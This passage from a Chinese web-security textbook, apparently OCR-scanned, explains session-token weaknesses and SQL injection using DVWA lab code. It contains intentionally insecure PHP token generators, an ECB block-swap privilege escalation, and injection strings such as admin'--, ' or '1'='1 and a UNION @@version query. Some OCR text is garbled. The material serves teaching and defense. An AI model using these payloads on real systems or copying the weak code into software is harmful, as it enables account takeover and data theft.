请 求 属于 会 话 的 一 部 分 。 在 会 话 管理 机 制 中 存在 的 主要 漏洞 有 两 大 类 : 会 话 令 牌 生成 
过 程 中 的 薄弱 环节 ; 四 在 程序 中 处 理会 话 令 牌 的 薄弱 环节 。 

当然 ,不 是 所 有 Web 程序 都 使 用 会 话 , 有 些 程序 通过 隐藏 表单 字段 或 Cookie 把 会 话 
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状态 发 给 客户 端 , 由 客户 端 自行 维护 状态 ,这 种 情况 必须 对 客户 端 传输 的 会 话 状态 进行 加 
密 保护 ,类 似 于 ASP. NET 中 的 ViewState 对 象 。 


13.4.1 令 牌 生成 过 程 的 缺陷 


令 牌 生成 过 程 的 安全 性 取决 于 令 牌 的 不 可 预测 性 ,当前 许多 Web 程序 都 采用 成 熟 的 
框架 代码 生成 会 话 令 牌 ,攻击 者 常常 在 这 些 平台 代码 中 发 现 有 关 令 牌 生成 过 程 中 的 可 利 
用 缺陷 。 

1. 有 含义 的 令 牌 

有 些 会 话 令 牌 通过 用 户 名 或 者 邮件 地 址 产生 ,或 者 再 结合 其 他 一 些 相 关 信 息 ,然后 将 
这 些 信息 进行 编码 处 理 。 当 攻击 者 对 某 个 令 牌 解码 发 现 其 组 成 方式 后 ,可 以 迅速 根据 已 
知 的 有 效用 户 名 产生 大 量 可 能 有 效 的 令 牌 。 例 如 ,下 面 的 令 牌 从 表面 上 看 似乎 由 一 长 串 
随机 字符 表示 : 


dXNlcjlndW9mYW47ZGF0ZTOYMDE3LTA4LTEz 


但 是 仔细 分 析 后 可 以 发 现 , 它 可 能 是 Base64 编码 的 串 , 使 用 Base64 解码 器 进行 解 
码 , 得 到 以 下 字符 串 “user 二 guofan; date 二 2017-08-13”, 表 明令 牌 由 用 户 名 和 当前 日 期 
组 成 。 

有 含义 的 令 牌 通常 由 几 种 成 分 组 成 ,以 分 隔 符 隔 开 ,攻击 者 可 以 分 别提 取 并 分 析 这 些 
成 分 ,通常 包括 以 下 几 项 : 账户 名 称 ; 加 账户 ID 号 ; 四 电子 邮箱 ; 四 用 户 角 色 或 所 属 
组 ; @ 日 期 /时 间 惟 ; @ 一 个 递增 或 可 预测 的 数字 ; DIP 地 址 。 

有 的 Web 程序 对 令 牌 的 不 同 部 分 采用 不 同 的 编码 方式 ,常用 编码 方案 见 第 13. 2. 3 
节 。 此 时 攻击 者 需要 对 令 牌 的 不 同 成 分 使 用 各 种 不 同 的 解码 方法 。 

2. 可 预测 的 令 牌 

有 些 令 牌 不 包含 与 特定 用 户 有 关 的 数据 ,但 是 包含 某 种 顺序 或 模式 ,攻击 者 通过 几 个 
样本 即 可 推断 出 应 用 程序 最 近 发 布 的 其 他 有 效 令 牌 ,因此 具有 可 预测 性 。 

图 13-10 列 出 DVWA 项 目的 低 安全 性 会 话 管理 机 制 的 实现 代码 ,会话 令 牌 仅仅 是 按 
照 顺 序 递 增 的 方式 产生 ,也 没有 做 任何 的 编码 处 理 。 这 种 机 制 非常 容易 受到 攻击 ,攻击 者 
只 需要 获得 两 三 个 令 牌 即 可 以 实施 攻击 ,轻松 冒充 其 他 用 户 ( 图 13-11) 。 

<?php 
if ( $ _SERVER[ 'REQUEST_METHOD'] == "POST") { 
if (!isset ( $ _SESSION[ 'last_session_id'])) { 
$ _SESSION[ 'last_session id'] = 0; 





} 

$ _SESSION[ 'last_session_id']++; // 会 话 ID 单纯 递增 
5$ cookie _ value = $ _SESSION['last session id']; 
setcookie( "dvwaSession", $ cookie value); 


?> 


图 13-10 DVWA 的 低 安全 性 管理 机 制 实现 代码 
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Name vaae 

HTRIT 200 OK 

eh Sun, 13 Avg 2017 020223 GUT 
server Apacner2 4.23 (Wn32) PHPIS625 
X-Powered By PHPS625 

Expres Tue, 23 Jun 2009 120000 GUT 
Cache-Control no-cache, mustrevaldale 
Pragma no-cache 

seo so | 
Content-Length 4310 

Connecton ciose 

Content-Type ex charset-utt 8 





图 13-11 低 安 全 性 令 牌 通过 Set-Cookie 返回 


大 多 数 Web 程序 的 令 牌 都 包含 复杂 的 序列 ,变化 形式 可 能 多 种 多 样 ,但 是 它们 通常 
来 自 以 下 几 个 方面 
(1) 隐 含 序列 : 表面 上 看 无 法 预测 ,但 是 通过 解码 或 变换 后 可 以 发 现 规律 。 图 13-12 
的 DVWA 的 较 高 安全 性 会 话 管理 代码 采用 递增 序列 的 MD5 摘要 值 作 为 会 话 令 牌 , 攻 击 
者 可 以 只 需要 识别 出 几 个 散 列 码 值 即 可 发 现 令 牌 的 规律 。 此 类 散 列 值 没有 加 盐 , 暴 力 破 
解 或 者 观察 在 线 散 列 数据 库 可 以 轻易 识别 。 
<?php 
if ( $ _SERVER[ 'REQUEST METHOD'] == "POST") { 
if (!isset ($_SESSION[ 'last_session_id_high'])) { 
$ _SESSION[ 'last_session_id high'] = 0; 
》 
$ _SESSION[ 'last_session_id high']++; 
$ cookie value = md5( $ _SESSION[ 'last_session id high']); 
setcookie( "dvwaSession", $ cookie value, time()+3600, "/vulnerabilities/weak_id/", 
$ _SERVER[ 'HTTP_HOST'], false, false); 


| 
?> 


13-12 DVWA 使 用 MD5 散 列 和 递增 序列 生成 令 牌 


图 13-13 显示 了 相应 HTTP 应 答 中 的 令 牌 表示 方式 ,图 13-14 指明 如 何 使 用 
Decoder 组 件 对 可 能 的 令 牌 编码 方式 进行 解码 的 示例 ,结果 表明 图 13-13 的 令 牌 值 实际 上 
是 数字 6 的 MD5 摘要 值 的 ASCII HEX 表示 。 

(2) 当时 时 间 : 使 用 时 间作 为 输入 ,通过 散 列 算法 生成 会 话 令 牌 ,攻击 者 可 以 根据 当 
前 时 间 穷 举 Web 程序 可 能 分 配给 其 他 用 户 的 有 效 令 牌 。 图 13-15 给 出 了 直接 使 用 当前 
时 间作 为 令 牌 的 DVWA 会 话 管理 机 制 代码 ,图 13-16 利用 BuprSuite 的 Intruder 组 件 演 
示 了 令 牌 的 动态 变化 过 程 。 
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PHP/S-€.25 









=-oo-oo cer 
该 值 等 于 MD5(6) 
-is 13-Aug-2017 


; domain®127.0.0.1 


Contenc-Type: text/htnl;charsetruct-8 








图 13-13 令 牌 在 应 答 中 的 表示 示例 








日 
9 加 再 9 加 器 可 加 加 加 器 器 加 加 口 品 | 
数字 6 的 MD5 搞 要 的 十 六 进 制 表 示 








1679091c5s8a0fa6fb5e6067ebb2dc 数字 6 的 MD5 摘 要 的 ASCI 十 六 进 制 码 表示 














图 13-14 使 用 BurpSuite 的 Decoder 组 件 对 令 牌 值 进行 验证 示例 


<?php 
证 ( $ _SERVER[ 'REQUEST METHOD'] == "POST") { 
$ cookie value = time(); // 直 接 使 用 当前 时 间作 为 令 牌 


setcookie("dvwaSession", $ cookie value); 


条 


图 13-15 使 用 时 间 令 牌 的 DVWA 会 话 管理 机 制 代码 
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13-16 ”利用 Intruder 组 件 显示 time() 函数 的 令 牌 规律 
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(3) 伪 随 机 数 生成 器 产生 的 “随机 ” 数 : 伪 随 机 数 并 不 是 真正 的 随机 数 ,存在 可 以 预 
测 的 规律 。 

3. 可 破解 的 加 密令 牌 

加 密令 牌 可 以 有 效 提高 令 牌 的 安全 性 ,因为 用 户 无 法 解密 令 牌 并 算 改 其 内 容 。 但 是 ， 
在 有 些 情况 下 根据 所 采用 的 加 密 算法 和 Web 程序 处 理 令 牌 的 方式 ,用 户 不 需要 解密 令 牌 
即 可 修改 令 牌 中 的 某 些 部 分 。 

1) ECB 加 密 

ECB( 电 子 密码 本 ) 分 组 加 密 方式 存在 明文 模式 和 密 文 模式 相同 的 问题 ,由 于 每 个 密 
文 分 组 始终 对 应 同一 个 明文 分 组 ,攻击 者 可 以 改变 密 文 分 组 的 顺序 ,以 某 种 有 意义 的 方式 
修改 明文 分 组 。 根据 Web 程序 处 理 加 密令 牌 的 方式 ,攻击 者 可 以 切换 到 其 他 用 户 或 者 提 
升 自 己 权 限 。 

假设 某 个 Web 程序 的 令 牌 包括 账户 名 称 和 账户 ID 号 ,ID 值 为 0 的 用 户 属于 管理 
员 , 类 似 “username 一 fguo;uid 二 1000;rnd 王 ……” 的 形式 ,攻击 者 可 以 注册 一 个 较 长 的 用 
户 名 “0000000fguo”, 那 么 产生 的 令 牌 按照 8 字 节 分 组 的 明文 和 密 文 将 如 图 13-17(a) 所 
示 。 攻 击 者 可 以 将 第 2 行 的 密 文 复制 一 份 到 第 4 行 ,使 得 对 应 解密 的 明文 变 成 图 13-17(b) 
所 示 ,此 时 账户 ID 号 已 经 变 成 全 0, 用 户 成 功 地 提升 为 管理 员 。 





username EC9A8C7D5FEDCCAE username EC9A8C7D5FEDCCAE 

= 0000000 8853A07DFE6A8C9D =0000000 8853A07DFE6A8C9D 

fguo;uid 2B3C4AE18D7C5FFE fguo;uid 2B3C4AE18D7C5FFE 

= 1000100 RARC1D2FCB3C5D6FE = 0000000 8853A07DFE6A8C9D 

SInds .oo irnd=... AACl1D2FCB3C5D6FE 
(a) (b) 


图 13-17 ECB 加 密 的 攻击 示例 


2) CBC 加 密 

CBC 加 密 可 以 避免 使 用 ECB 的 某 些 问题 , 它 在 解密 时 对 每 个 密 文 分 组 与 下 一 个 解 
密 的 文本 块 进行 XOR 运算 以 获得 明文 。 如 果 攻 击 者 修改 密 文 的 某 些 部 分 ,将 导致 特定 
的 分 组 被 解密 成 乱码 ,同时 导致 下 一 个 解密 的 分 组 将 与 不 同 的 值 进行 XOR 运算 ,从 而 生 
成 经 过 修改 的 但 是 仍然 有 意义 的 明文 。 也 就 是 说 ,通过 操纵 令 牌 中 的 某 个 分 组 ,攻击 者 能 
够 修改 该 分 组 之 后 的 解密 内 容 ,如果 Web 程序 以 不 安全 的 方式 处 理 生成 的 解密 令 牌 , 例 
如 仅仅 检查 解密 令 牌 的 部 分 信息 ,那么 攻击 者 就 能 够 以 类 似 图 13-17 的 方式 提升 自身 
权限 。 


13.4.2 令 牌 处 理 过 程 的 缺陷 


Web 程序 常常 使 用 不 安全 的 方式 处 理 令 牌 ,导致 令 牌 易于 受到 攻击 。 即 使 采用 加 密 
技术 保护 令 牌 ,但 是 在 处 理 过 程 中 犯 下 的 错误 依然 会 导致 令 牌 泄露 。 

1. 明文 传输 令 牌 

Web 程序 在 传输 令 牌 时 常常 会 犯 以 下 一 些 错 误 : 
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(1) 使 用 HTTP 协议 或 者 通过 Cookie 明文 传输 令 牌 使 得 令 牌 非常 容易 被 截获 。 

(2) 在 登录 阶段 使 用 HTTPS 保护 令 牌 ,但 是 在 会 话 的 其 他 阶段 却 使 用 HTTP。 

(3) 在 站 点 首页 使 用 HTTP 时 就 分 配 了 令 牌 ,在 用 户 登 录 转 向 HTTPS 后 ,没有 修 
改 该 令 牌 。 

2. 在 日 志 中 存储 令 牌 

许多 Web 程序 为 管理 员 提 供 监控 和 控制 程序 运行 时 状态 (包括 用 户 会 话 ) 的 功能 ,这 
种 功能 会 泄露 每 个 会 话 的 令 牌 。 而 且 这 种 功能 往往 没有 经 过 严格 的 安全 测试 ,常常 允许 
未 授权 用 户 访问 ,导致 用 户 会 话 被 劫持 。 如 果 Web 程序 使 用 URL 的 查询 参数 串 作为 令 
牌 传输 机 制 ,那么 令 牌 就 会 随同 URL 存储 在 系统 日 志 中 ,如 浏览 器 日 志 、 服 务 器 日 志 、 代 
理 服 务 器 日 志和 Referer 日 志和 

3. 脆弱 的 令 牌 一 会 话 映射 

如 果 Web 程序 将 会 话 令 牌 和 用 户 会 话 进行 映射 的 过 程 中 存在 以 下 缺陷 ,也 会 导致 会 
话 管理 机 制 的 漏洞 。 

(1) 允许 一 个 账户 同时 分 配 不 止 一 个 的 有 效 令 牌 。 

(2) 使 用 “静态 "不 变 的 令 牌 , 即 相 同 的 用 户 每 次 登录 都 使 用 相同 的 令 牌 。 

(3) 处 理会 话 的 权限 不 由 会 话 令 牌 决定 ,而 是 通过 其 他 方式 由 HTTP 请 求 决定 , 导 
致 请 求 者 可 以 直接 控制 用 户 权 限 。 

4. 不 安全 的 会 话 终止 

许多 Web 程序 没有 正确 地 实现 会 话 终 止 功能 ,导致 令 牌 在 会 话 关闭 很 长 时 间 之 后 依 
然 存 在 ,使 得 容易 被 攻击 者 截获 。 

(1) 程序 没有 执行 退出 功能 ,用 户 无 法 终止 会 话 ,程序 无 法 释放 令 牌 。 

(2) 程序 实现 了 退出 功能 ,但 是 令 牌 没有 释放 ,攻击 者 如 果 继续 提交 该 令 牌 ,程序 依 
然 接受 。 

(3) 当 用 户 在 浏览 器 中 执行 退出 时 ,并 没有 与 服务 器 通信 ,只 是 在 客户 端 清空 
Cookie, 服 务 器 的 状态 没有 发 生 任何 变化 。 攻 击 者 只 要 截获 该 Cookie 就 能 够 继续 使 用 该 
会 话 。 

5. 客户 端 令 牌 动 持 

攻击 者 可 以 采用 各 种 方法 向 Web 程序 的 其 他 用 户 发 起 攻击 ,截获 他 们 的 令 牌 。 

(1) 通过 跨 站 脚本 攻击 查询 用 户 的 Cookie, 获 得 令 牌 信息 后 将 令 牌 发 送 至 攻击 者 控 
制 的 服务 器 。 

(2) 实施 会 话 固定 攻击 ,向 一 名 用 户 发 送 包含 已 知 会 话 令 牌 的 URL, 等 待 他 点 击 登 
录 , 然 后 劫持 他 的 会 话 。 

(3) 实施 跨 站 请 求 伪造 攻击 ,攻击 者 诱 使 用 户 点 击 某 个 专门 设计 的 链接 ,点 击 该 链接 
将 导致 用 户 在 不 知情 的 情况 下 在 后 台 访 问 某 个 正常 网 站 ,造成 经 济 损失 或 信息 泄露 。 


13.4.3 保障 会 话 管理 的 安全 性 


鉴于 会 话 管理 机 制 主要 受 两 类 漏洞 的 影响 , Web 程序 必须 采取 相应 的 防御 措施 , 采 
用 可 靠 的 方式 生成 令 牌 ,在 令 牌 处 理 过程 中 确保 它们 的 安全 。 
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1. 生成 强大 的 令 牌 


设计 强大 的 令 牌 生成 机 制 的 目的 在 于 : 即使 攻击 者 拥有 大 量 带宽 和 处 理 资源 ,也 绝 
不 可 能 在 令 牌 的 有 效 期 内 ,成功 猜测 出 任何 一 个 有 效 的 令 牌 。 

(1) 令 牌 应 该 只 包含 一 个 标识 符 用 于 定位 会 话 对 象 ,不 包含 任何 有 意义 的 结构 。 

(2) 所 有 与 用 户 和 状态 有 关 的 会 话 数 据 都 必须 保存 在 服务 器 的 会 话 对 象 中 。 

(3) 并 慎 选 择 随机 源 再 加 上 一 些 与 请 求 有 关 的 信息 作为 炉 源 ,包括 : 

QO@ IP 地 址 和 端口 ; 

@ User-Agent 消息 头 ; 

@ 请 求 时 间 ( 以 ms 为 单位 ) 。 

最 有 效 的 令 牌 就 是 建立 一 个 字符 串 ,连接 伪 随 机 数 、 上 述 炉 源 以 及 一 个 服务 器 每 次 重 
启 都 新 产生 的 随机 密 钥 ,然后 采用 高 强度 散 列 算法 对 这 个 字符 串 进行 处 理 , 生 成 固定 长 度 
的 字符 串 作 为 令 牌 。 图 13-18 给 出 了 DVWA 项 目的 高 安全 性 会 话 管理 机 制 的 代码 , 它 采 
用 随机 程度 较 高 的 mt_rand 函数 生成 伪 随 机 数 ,再 使 用 time 函数 获得 当前 请 求 时 间 ， 
“Impossible" 作 为 密 钥 字符 串 , 对 三 类 字符 进行 拼接 后 进行 SHA-1 散 列 计算 ,产生 的 散 
列 码 作为 会 话 令 牌 。 只 要 攻击 者 无 法 猜测 这 个 密 钥 字符 串 ,会 话 令 牌 不 可 能 在 有 效 时 间 
内 被 破解 。 


<?php 
if ( $ _SERVER[ 'REQUEST METHOD'] == "POST") { 
$ cookie value = shal(mt_rand() . time() ."Impossible");  // 令 牌 由 三 部 分 拼接 然后 


// 散 列 计算 
setcookie( "dvwaSession", $ cookie value, time()+3600, "/vulnerabilities/weak_id/", 
$ _SERVER[ 'HTTP_HOST'], true, true); 
} 


?> 


图 13-18 高 强度 的 令 牌 示例 


2. 保障 令 牌 处 理 过 程 的 安全 

在 建立 无 法 预测 的 安全 令 牌 后 ,必须 确保 该 令 牌 不 会 被 攻击 者 截获 。 应 该 注意 的 安 
全 事项 包括 : 

(1) 令 牌 只 能 通过 HTTPS 传送 。 

(2) 绝对 不 要 在 URL 中 传递 令 牌 。 

(3) 正确 执行 退出 功能 ,删除 所 有 与 会 话 有 关 的 资源 并 终止 会 话 令 牌 。 

(4) 当 会 话 处 于 空闲 状态 一 定时 间 后 ,应 该 执行 会 话 退出 功能 。 

(5) 绝 不 允许 一 个 用 户 同 时 拥有 两 个 以 上 令 牌 。 

(6) 当 收 到 用 户 提交 的 无 效 令 牌 时 ,可 以 立即 终止 会 话 , 将 用 户 返 回 起 始 页 面 。 

(7) 在 执行 重要 操作 时 ,可 以 要 求 进行 两 步 确认 或 重新 验证 身份 以 防止 跨 站 伪造 请 
求 攻击 。 

(8) 在 验证 成 功 后 总 是 建立 一 个 新 的 会 话 ,避免 受到 会 话 固定 攻击 。 

(9) 如 果 可 能 ,可 以 在 会 话 令 牌 的 基础 上 实现 页 面 令 牌 ,对 会 话 实 施 更 严格 的 控制 。 
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13.5 数据 存储 区 的 安全 性 


几乎 所 有 的 Web 程序 都 依赖 数据 存储 区 管理 数据 ,使 用 不 同 的 权限 级 别管 理 各 种 访 
问 操作 以 及 处 理 属于 不 同 用 户 的 数据 。 一 旦 攻击 者 能 够 破坏 Web 程序 与 存储 区 域 之 间 
的 交互 ,使 得 他 们 可 以 直接 检索 或 修改 数据 ,那么 攻击 者 就 可 以 绕 开 Web 程序 实施 的 访 
问 控制 机 制 。 常 见 的 数据 存储 区 是 SQL 数据 库 、 基 于 XML 的 资料 库 和 LDAP 目录 ,本 
节 主 要 介绍 SQL 数据 库 的 安全 性 。 

Web 程序 的 核心 功能 往往 使 用 解释 型 语言 编写 ,如 SQL、PHP 和 JSP 等 ,而 解释 器 
处 理 的 数据 常常 由 代码 和 数据 混合 组 成 。 攻 击 者 可 以 精心 设计 恶意 输入 ,使 得 输入 数据 
的 一 部 分 被 解释 成 程序 指令 执行 ,从 而 实现 代码 注入 (Code Injection) 攻 击 。 

大 部 分 Web 程序 访问 SQL 数据 库 的 过 程 基本 相同 ,它们 实施 自主 访问 控制 ,构造 程 
序 基 于 用 户 的 账户 和 类 型 检索 .增加 或 修改 数据 。 如 果 程 序 的 业务 逻辑 依赖 查询 的 结果 ， 
攻击 者 就 可 以 修改 查询 改变 程序 的 逻辑 ,例如 登录 时 根据 账户 和 密码 决定 是 否 允 许 用 户 
登录 。 许 多 Web 程序 只 是 简单 地 执行 以 下 SQL 查询 确认 每 次 尝试 : 


Select * from users where username = 'fguo' and password = 'good '" 


攻击 者 可 以 注入 账户 或 者 密码 字段 以 修改 Web 程序 的 执行 ,例如 (假设 数据 库 为 
MySQL) 注 入 账户 字段 ,输入 “admin'--”, 将 查询 变 成 

Select * from users Where username = 'admin' -- 'and password= 'good ' 
将 SQL 查询 的 后 半 部 分 使 用 “--” 注 释 符 注释 掉 , 查 询 实质 上 变 成 

Select * from users where username = 'admin’ 
该 查询 仅仅 检索 是 否 存在 “admin” 账 户 ,攻击 者 从 而 绕 过 了 密码 检查 。 

上 述 攻击 称 为 SQL 注入 攻击 , 它 是 威胁 Web 程序 的 最 著名 攻击 之 一 。 最 坏 情 况 下 ， 
攻击 者 可 以 读 取 并 修改 数据 库 中 的 所 有 数据 ,甚至 完全 控制 运行 数据 库 程 序 的 服务 器 系 
统 。 对 于 大 部 分 数据 库 而 言 ,SQL 注入 的 基本 原理 都 类 似 , 但 是 具体 的 注入 语法 和 方法 
存在 很 大 差异 ,因为 不 同 数据 库 的 实现 方式 大 不 相同 。 后 续 章 节 以 MySQL 数据 库 为 例 ， 
结合 DVWA 示例 代码 说 明 SQL 注入 攻击 原理 和 防御 技术 。 


13.5.1 SQL 注入 原理 


1. 漏洞 产生 原理 

Web 程序 常常 允许 在 运行 过 程 中 动态 构造 SQL 语句 ,根据 不 同 条 件 生成 不 同 的 
SQL 语句 ,但 是 程序 员 在 构造 SQL 语句 时 往往 没有 意识 到 代码 中 存在 的 潜在 安全 问题 ， 
容易 导致 SQL 注入 漏洞 。 

1) 转 义 字符 处 理 不 当 

MySQL 将 单 引号 “' ?解析 为 代码 和 数据 的 分 界线 :引号 外 面 的 内 容 为 SQL 执行 代 
码 ,而 单 引 号 括 起 来 的 内 容 都 是 数据 。 图 13-19 是 DVWA 项 目的 低 安 全 性 SQL 注入 演 
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示 代码 0, 该 代码 查询 数据 库 中 是 否 存 在 输入 的 “id”, 如 果 存 在 则 返回 该 *id” 对 应 的 账户 
姓名 。 


<?php 
if( isset( $_ REQUEST[ 'Submit'] ) ) { 
$id = $_REQUEST[ 'id' ]; 
$ query = "SELECT first_name, last_name FROM users WHERE user_ id = '$ id';"; 
$result = mysqli query(...) or die (mysqli error(...)); 
while( $row = mysqli fetch assoc( $result ) ) { 


$first = $row["first name"]; 

$last = $row["last name"]; 

$html . = "<pre>ID: {$ id}<br />First name: { $ first}< br /> Surname: { $ last} 
</pre>"; 


mysqli close( $ GLOBALS[" mysqli_ston"]); 


图 13-19 DVWA 的 低 安全 性 SQL 注入 代码 示例 


该 代码 没有 对 “id” 做 任何 的 处 理 ,攻击 者 可 以 设置 “id” 为 “”,DVWA 产生 的 结果 如 
下 所 示 : 
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server 
version for the right syntax to use near '''"' at line 1 
因为 Web 程序 执行 的 查询 , 变 成 了 
SELECT first_name, last_name FROM users WHERE user_id = ""'; 


该 查询 存在 语法 错误 ,所 以 mysqli_error 函数 返回 相应 错误 信息 。 攻 击 者 使 用 单 引 
号 转 义 了 Web 程序 的 查询 语句 。 如 果 攻 击 者 设置 *id” 为 *'or '1' 二 "1”, 则 可 以 列 出 
“users” 表 中 的 所 有 用 户 , 如 图 13-20 所 示 。 单 引号 不 是 唯一 的 具有 特殊 含义 的 转 义 符 ， 
例如 在 Oracle 中 ,空格 和 双 竖 线 都 有 特殊 含义 。 

2) 类 型 处 理 不 当 

Web 程序 员 可 以 对 输入 进行 净化 ,消除 输入 中 出 现 的 单 引号 等 转 义 字符 。 但 是 ,如 
果 输 入 数据 在 SQL 语句 中 被 作为 数字 类 型 处 理 , 即 输入 在 SQL 语句 中 没有 被 单 引号 括 
起 来 ,那么 攻击 者 不 输入 单 引 号 也 可 以 成 功 实施 SQL 注入 攻击 。 

图 13-21 给 出 一 段 代码 片段 , 它 列 出 了 DVWA 的 中 安全 性 SQL 注入 示例 与 图 13-19 
代码 的 不 同 之 处 。 该 示例 首先 使 用 函数 “mysqli_real_escape_string” 净 化 输入 的 单 引号 
等 转 义 字符 ,然后 直接 将 输入 的 ID 值 作为 数字 类 型 送 入 SQL 语句 中 。 攻 击 者 如 果 使 用 
BurpSuite 将 POST 请 求 中 的 “id” 值 设 为 单 引 号 ,DVWA 返回 的 结果 如 下 所 示 : 


® DVWA-master\vulnerabilities\sqli\source\low. php。 
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Vulnerability: SQL Injection 





User ID- 





ID: ”or "1 二 1 
First nane: Gordon 
Surnane: Brown 


TD or el 
First nane: Hack 
Surnane: We 





了 
First nane: Bob 
Surnane; Snith 











图 13-20” 低 安全 性 代码 的 SQL 注入 示例 


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server 
version for the right syntax to use near '\''at line 1 


注意 ,输入 的 单 引号 前 面 增加 了 转 义 符号 反 斜 本 ,这 表明 单 引号 字符 已 经 被 Web 程 
序 净化 。 但 是 图 13-21 的 代码 没有 判定 “id” 值 是 否 确实 是 数字 类 型 ,导致 攻击 者 可 以 利 
用 类 似 *1 or 1 二 1” 的 输入 获取 与 图 13-20 类 似 的 结果 ,如 图 13-22 所 示 。 


<?php 

if( isset( $_POST[ 'Submit'] ) ) { 
$id = $_POST[ 'id']; /用 POST 提交 
$ id = mysqli_real_escape_string( $ GLOBRLS["” _mysqli_ston"]，$ id); ”// 净 化 单 引号 
$query = "SELECT first_name, last_name FROM users WHERE user_id = $ id;"; 


// 使 用 数字 类 型 
图 13-21 中 安全 性 SQL 注入 代码 示例 
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图 13-22 中 安全 性 SQL 注入 攻击 示例 
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3) 语句 组 装 错 误 


如 果 SQL 语句 中 的 查询 结构 由 输入 决定 ,例如 查询 的 表 名 、 列 名 等 ,但 是 又 没有 正确 
地 对 输入 进行 净化 ,那么 攻击 者 只 需要 输入 数据 库 中 存在 的 表 名 和 列 名 就 可 以 进行 非 授 
权 检索 或 修改 数据 。 例 如 以 下 语句 : 


$sql = "select" . $_GET["columnl"] . ","”. $_GET["column2"] . "from" . $ _GET["table"]; 


如 果 程 序 没 有 对 用 户 输入 的 “column1”column2” 和 “tables” 变 量 进行 输入 验证 和 访问 限 
制 , 攻 击 者 可 以 控制 这 几 个 输入 变量 遍历 数据 库 中 的 所 有 数据 。 
4) 错误 处 理 不 正确 
错误 处 理 不 当 会 给 Web 站 点 带 来 很 多 安全 问题 ,例如 将 详细 的 内 部 错误 信息 显示 给 
用 户 或 者 攻击 者 ,这 些 细节 泄露 了 与 站 点 潜在 缺陷 相关 的 重要 线索 。 图 13-19 中 的 代码 
返回 的 错误 消息 中 就 泄露 了 该 站 点 的 后 台 服 务 器 是 MySQL 服务 器 ,同时 显示 了 该 Web 
程序 没有 对 输入 中 的 单 引号 进行 转 义 ,图 13-21 的 代码 同样 存在 类 似 问题 。 
5) 多 个 提交 的 处 理 错误 
当 Web 程序 需要 处 理 多 个 不 同 表单 的 顺序 提交 时 ,没有 按照 边界 确认 模型 对 每 个 提 
交 的 表单 执行 正确 的 输入 验证 ,导致 程序 产生 SQL 注入 漏洞 。 示 例 代 码 如 图 13-23 所 
示 , 由 于 第 一 个 表单 的 "param” 人 参数 已 经 被 验证 ,程序 员 没有 想到 第 二 个 表单 同样 需要 验 
证 。 如 果 攻 击 者 直接 提交 “form2” 并 构造 恶意 输入 参数 “param”, 则 可 以 成 功 实施 SQL 
注入 攻击 。 
if ($_GET['form'] = 'forml'){ 
if (is_string( $ _GET[ 'param'])){ 
$ bool = validate( $ _GET[ 'param']); // 对 输入 进行 确认 
if ($bool = false) 
die(...); 
} 
} 
if ($_GET['form'] = 'form2') { 
$sql = "select * from tables where id = $ _GET[ 'param']"; 
$ result = mysqli query(sql); 


图 13-23 多 次 提交 的 处 理 错误 代码 示例 


6) 不 安全 的 数据 库 配 置 

数据 库 带 有 很 多 默认 的 预 安装 内 容 , MySQL 使 用 “root” 和 “anonymous” 默 认 账 户 ， 
而 且 默 认 口 令 众所周知 ,如 果 管 理 员 遗忘 了 修改 默认 设置 ,那么 攻击 者 可 以 轻易 获得 数据 
库 的 访问 权限 。 

数据 库 在 安装 时 允许 以 管理 员 身 份 执行 数据 库 操 作 ,一 旦 数据 库 被 攻击 ,那么 攻击 者 
就 获得 了 最 高 权限 。 应 该 始终 以 普通 用 户 的 权限 运行 数据 库 服 务 , 即 使 遭受 攻击 也 可 以 
减少 对 其 他 进程 和 操作 系统 的 破坏 。 

许多 程序 员 在 编写 数据 库 访 问 代码 时 喜欢 使 用 功能 强大 的 内 置 权 限 账户 来 连接 数据 
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库 , 一 旦 攻击 者 成 功 实施 攻击 ,就 相当 于 获得 了 这 些 账户 的 权限 。 因 此 ,应 该 根据 程序 需 
要 建立 特定 的 数据 库 用 户 ,最 好 是 使 用 不 同 的 用 户 分 别 执行 SELECT、UPDATE、 
INSERT 等 不 同 的 数据 库 操作 。 

数据 库 默认 还 支持 一 些 高 级 权限 操作 .例如 MySQL 中 的 LOAD_FILE 操作 可 以 从 
系统 中 读 取 文件 信息 ,MSSQL 的 xp_cmdshell 脚本 可 以 执行 系统 命令 ,这 些 功能 的 应 用 
必须 经 过 严格 的 安全 测试 ,如 无 必要 ,应 该 关闭 相应 功能 。 

2. SQL 注入 方法 

SQL 注入 的 方法 众多 ,限于 篇 幅 , 本 节 仅 列 出 了 一 些 较 为 常见 的 注入 方法 ,有 兴趣 的 
读者 可 以 进一步 阅读 参考 文献 中 列 出 的 相应 书目 。 

1) 指纹 识别 数据 库 

攻击 者 要 成 功 实施 SQL 攻击 ,首先 必须 确认 Web 程序 所 使 用 的 数据 库 服务 器 的 类 
型 和 版 本 。 图 13-19 和 图 13-21 的 代码 返回 的 错误 信息 泄露 了 数据 库 服务 器 的 类 型 是 
MySQL, 但 是 没有 告知 版 本 信息 。 由 于 不 同 的 数据 库 有 不 同 的 语法 特征 和 接口 函数 , 攻 
击 者 可 以 利用 它们 区 分 不 同 数据 库 。 例 如 ,MySQL 拼接 字符 串 的 符号 是 空格 ,Oracle 是 
双 竖 线 , 通 过 在 输入 字符 串 中 采用 这 些 不 同 的 符号 , 即 可 根据 返回 的 结果 区 分 后 台数 据 库 
的 类 型 。MySQL 获取 数据 库 的 版 本 号 的 方法 是 使 用 变量 "@@version”, 根 据 已 知 的 数 
据 库 类 型 ,可 以 进一步 确认 版 本 号 (图 13-24)。 


Vulnerability: SQL Injection 





User ID Submk 
Fi ain 


查询 版 本 号 





ID: 1” union select null, @Bversion 一 


Fi 
Ee cs 。。 吕 示 版 本 信息 








图 13-24 查询 数据 库 版 本 号 的 示例 


2) UNION 操作 

SQL 使 用 UNION 操作 符 将 多 个 SELECT 语句 的 结果 组 合 到 一 个 独立 的 结果 中 ,如 
果 某 个 SELECT 语句 存在 SQL 注入 漏洞 ,通常 可 以 使 用 UNION 执行 另 一 次 完全 独立 
的 查询 ,利用 这 种 技巧 ,攻击 者 可 以 获得 任何 数据 。 如 图 13-24 所 示 ,输入 “1' union select 
null,@@version --”, 从 数据 库 中 返回 了 两 行 结果 ,一 是 “ID? 为 1 的 账户 姓名 ,二 是 数据 
库 的 版 本 信息 。Web 程序 动态 构建 的 SQL 语句 变 成 





SELECT first_name, last_name FROM users WHERE user_id = '1'union select null, @@version; 


UNION 操作 符 在 SQL 注入 攻击 中 可 以 发 挥 巨大 的 作用 ,但 是 该 操作 符 存在 两 个 重 
